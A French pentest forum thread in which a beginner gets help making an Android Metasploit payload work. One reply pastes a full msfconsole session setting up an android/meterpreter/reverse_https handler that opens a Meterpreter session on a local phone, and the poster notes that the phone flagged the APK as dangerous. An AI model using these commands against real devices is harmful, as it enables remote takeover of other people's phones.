Auteur Sujet: [Résolu] Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter  (Lu 8537 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne Camillerakoto
  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #45 le: 03 juin 2019 à 18:34:34 »
D'accord, je vais voir cela, merci  :)

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3081
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Tiens avant d'utiliser evil-droid (qui n'est qu'un bash qui va taper dans metasploit et apktool) et ne t'apprendra rien, essaie plutot de creer ton 1er payload android en suivant ce post :

http://www.kali-linux.fr/forum/index.php/topic,4306.msg21379.html#msg21379
merci pour lui avoir donné le lien :)
Mess  with the bests.
Die like the rest.

Hors ligne _john_doe
  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 608
  • +37/-5
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #47 le: 03 juin 2019 à 19:08:10 »
Juste pour la blagounette j'ai testé Evil-Droid.
Il marche nickel je recupere un shell. C'est donc tes parametres qui ont un pb

   
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .

   o                  To boldly go where no
                            shell has gone before


       =[ metasploit v5.0.26-dev                          ]
+ -- --=[ 1894 exploits - 1068 auxiliary - 329 post       ]
+ -- --=[ 547 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]


msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_https
payload => android/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST 192.168.0.25
LHOST => 192.168.0.25
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit

[*] Started HTTPS reverse handler on https://192.168.0.25:4444
[*] https://192.168.0.25:4444 handling request from 192.168.0.24; (UUID: uo0jhwtg) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.0.25:4444 -> 192.168.0.24:58063) at 2019-06-03 19:03:16 +0200

meterpreter > sysinfo
Computer    : localhost
OS          : Android 8.0.0 - Linux 3.18.91-14843133-QB20949348 (aarch64)
Meterpreter : dalvik/android
meterpreter >


Hors ligne Camillerakoto
  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #48 le: 03 juin 2019 à 19:28:13 »
Je n'arrive pas à trouver le problème  :'(

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1659
  • +112/-1
  • Multiboot Linux - Kali en Amateur - python(A)
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #49 le: 03 juin 2019 à 19:50:18 »
Perso, je ne connais pas evil-droid, mais je pense que tout est faisable depuis ton terminal, pas besoin d'evil-droid... Cependant _john_doe t'a prouvé que cette appli fonctionne si elle est bien paramétré.

Revois tes paramétres, ta methodologie, et tes commandes, si john y est arrivé en local tu dois pouvoir le faire aussi!  :)

A l'époque c'était système_D (Comme démerdes-toi!)
On ne gagne pas sa Liberté , On choisi de la prendre!
Membre du P.L.F, Bill Gate$ suck'$.
Anti GAFAM - Brûlons les tous!
Eux, c'est les pommes, et vous les poires...

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3081
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #50 le: 03 juin 2019 à 20:01:00 »
Oui evil-droid marche très bien je m'en sers des fois donc comme john l'a dit , le problème viens surêment de tes options ou de ta méthodo et Snk le confirme :)
Prends le temps de bien comprendre ce que tu fais et ne te presse pas sinon tu n'apprendra pas :)
Mess  with the bests.
Die like the rest.

Hors ligne Camillerakoto
  • Membre Junior
  • *
  • Messages: 23
  • +0/-0
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #51 le: 04 juin 2019 à 15:35:28 »
Bonsoir tout le monde ! Le problème venait en fait de mon téléphone qui n'acceptait pas de lancer l'apk car il disait qu'il détectait que c'était dangereux !
J'ai donc utilisé ma tablette d'une version antérieure et cela a fonctionné !
Merci à tous pour vos aides :)

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3081
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Metasploit : Le playload ne s'éxecute pas ainsi que meterpreter
« Réponse #52 le: 04 juin 2019 à 15:37:52 »
De rien , merci pour ton retour , à bientôt
Mess  with the bests.
Die like the rest.